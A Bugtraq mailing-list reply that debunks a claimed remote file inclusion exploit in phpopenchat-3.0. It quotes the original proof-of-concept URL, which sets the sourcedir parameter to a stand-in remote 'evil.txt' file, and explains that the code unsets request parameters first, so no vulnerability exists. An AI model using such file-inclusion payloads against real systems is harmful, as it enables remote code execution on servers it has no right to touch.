Bugtraq mailing list archives

Re: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit


From: "Carsten Eilers" <ceilers-lists () gmx de>
Date: Fri, 8 Sep 2006 00:18:25 +0200

Hi,

stormhacker () hotmail com schrieb am Wed, 6 Sep 2006 19:17:11 +0000:

-----------------Description---------------


include_once("QueryString.php");

include_once("Settings.php");

include_once("$sourcedir/Subs.php");

include_once("$sourcedir/Errors.php");

include_once("$sourcedir/Load.php");

//include_once("$sourcedir/Security.php");

Nice.

But you forgot the three little line above of this:

| $givenParams = array_keys($_REQUEST);
| foreach($givenParams as $param )
|  unset(${$param});

And this...

--------------PoC/Exploit----------------------


http://www.host.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://
host/evil.txt?

... unsets your set sourcedir.
Result: There is no vulnerability.

Maybee $sourcedir is set/manipulated in QueryString.php
or Settings.php, but these script see nothing about your
manipulated sourcedir since it's unset before the includes.

--------------Solution---------------------


No Patch available.

No patch necessary.

Regards
  Carsten

--
Dipl.-Inform. Carsten Eilers
IT-Sicherheit und Datenschutz

<http://www.ceilers-it.de>



Current thread: